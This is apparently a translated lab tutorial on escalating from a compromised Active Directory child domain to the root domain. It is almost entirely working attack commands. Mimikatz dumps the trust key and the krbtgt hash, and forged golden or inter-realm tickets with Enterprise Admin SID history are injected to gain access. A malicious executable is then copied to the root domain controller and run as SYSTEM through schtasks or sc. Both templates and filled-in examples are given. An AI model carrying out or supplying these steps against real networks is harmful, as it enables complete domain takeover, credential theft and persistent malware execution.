内网渗透-域控安全和跨域攻击-获取目标域方法总结

## Obtaining the target domain with the domain trust key

### Lab environment

| IP address | Domain | Role in the domain | Machine name | Currently logged-in user |
| --- | --- | --- | --- | --- |
| 192.168.113.152 | test.com | DC of the root domain | DC | hack\administrator |
| 192.168.113.153 | abc.test.com | DC of the child domain | DC2 | abc\administrator |
| 192.168.113.156 | abc.test.com | Machine in the child domain | Abc-losy | abc\losy |

The abc.hack.com domain is already under control, including the DC2 machine and the ABC-LOSY machine.

### Lab steps

At this point the losy user cannot access DC.test.COM:

```
shell dir \\dc.test.com\c$
```

On the controlled DC2, use mimikatz to obtain the current domain's SID, the parent domain's SID, the child domain admin's NTLM hash and the trust key:

```
mimikatz.exe privilege::debug lsadump::lsa /patch /user:TEST$ lsadump::trust /patch exit
```

Relevant output:

```
mimikatz privilege::debug
mimikatz lsadump::lsa /patch /user:TEST$
mimikatz lsadump::trust /patch
Current domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)
Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)
rc4_hmac_nt 277a4340abf41c1a580dc99c730f20d8
```

As the ordinary domain user losy, create a high-privilege ticket. Template:

```
mimikatz.exe kerberos::golden /domain:<child domain> /sid:<child domain SID> /sids:<parent domain SID>-519 /rc4:<trust key> /user:<any user> /service:krbtgt /target:<parent domain> /ticket:subdc_administrator.kirbi exit
```

Filled in for this lab:

```
mimikatz kerberos::golden /domain:abc.test.com /sid:S-1-5-21-138967882-756984254-3016740272 /sids:S-1-5-21-2071415428-1615975719-3128489008-519 /rc4:277a4340abf41c1a580dc99c730f20d8 /user:administrator /service:krbtgt /target:test.com /ticket:administrator.kirbi
```

Upload the asktgs.exe and kirbikator.exe tools: asktgs.exe forges the service ticket, kirbikator.exe injects the ticket.

Create a ticket for the CIFS service in order to copy files:

```
shell asktgs.exe administrator.kirbi CIFS/DC.test.com
```

Inject the ticket into memory:

```
shell kirbikator.exe lsa CIFS.DC.test.com.kirbi
```

Access the domain controller:

```
shell dir \\dc.test.com\c$
```

Copy the malicious file (if the copy fails, inject a host service ticket instead):

```
shell copy 123.exe \\dc.test.com\c$
```

Forge a host service ticket in order to create a scheduled task:

```
shell asktgs.exe administrator.kirbi host/DC.test.com
```

Inject the ticket into memory:

```
shell kirbikator.exe lsa host.DC.test.com.kirbi
```

Upload the malicious file and create the scheduled task:

```
shell copy 123.exe \\dc.test.com\C$\
shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f
```

Run the scheduled task:

```
shell schtasks /run /s dc.test.com /i /tn test123
```

sc works as well:

```
shell copy 123.exe \\dc.test.com\C$\
shell sc \\dc.test.com create test binpath cmd.exe /c c:\123.exe
shell sc \\dc.test.com start test
shell sc \\dc.test.com delete test
```

Tip: if you run into "access denied" partway through, the ticket's timestamp has expired; run `shell klist purge` and redo the steps.

## Obtaining the target domain with the krbtgt hash

### Lab environment

| IP address | Domain | Role in the domain | Machine name | Currently logged-in user |
| --- | --- | --- | --- | --- |
| 192.168.113.152 | test.com | DC of the root domain | DC | hack\administrator |
| 192.168.113.153 | abc.test.com | DC of the child domain | DC2 | abc\administrator |
| 192.168.113.156 | abc.test.com | Machine in the child domain | Abc-losy | abc\losy |

The abc.hack.com domain is already under control, including the DC2 machine and the ABC-LOSY machine.

### Lab steps

On DC2, obtain the krbtgt hash:

```
mimikatz lsadump::lsa /patch /user:krbtgt
NTLM : f778d436c7b4ccecb735d596638c547a
```

On DC2, obtain the key information:

```
mimikatz lsadump::trust /patch
Current domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)
Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)
```

As the losy user, construct and inject a golden ticket. Template:

```
mimikatz Kerberos::golden /user:administrator /domain:<current domain> /sid:<current SID> /sids:<target domain SID>-519 /krbtgt:<krbtgt hash> /ptt
```

Filled in for this lab:

```
mimikatz Kerberos::golden /user:administrator /domain:abc.test.com /sid:S-1-5-21-138967882-756984254-3016740272 /sids:S-1-5-21-2071415428-1615975719-3128489008-519 /krbtgt:f778d436c7b4ccecb735d596638c547a /ptt
```

Access the target domain:

```
shell dir \\dc.test.com\c$
```

Upload the malicious file and create the scheduled task:

```
shell copy 123.exe \\dc.test.com\C$\
shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f
```

Run the scheduled task:

```
shell schtasks /run /s dc.test.com /i /tn test123
```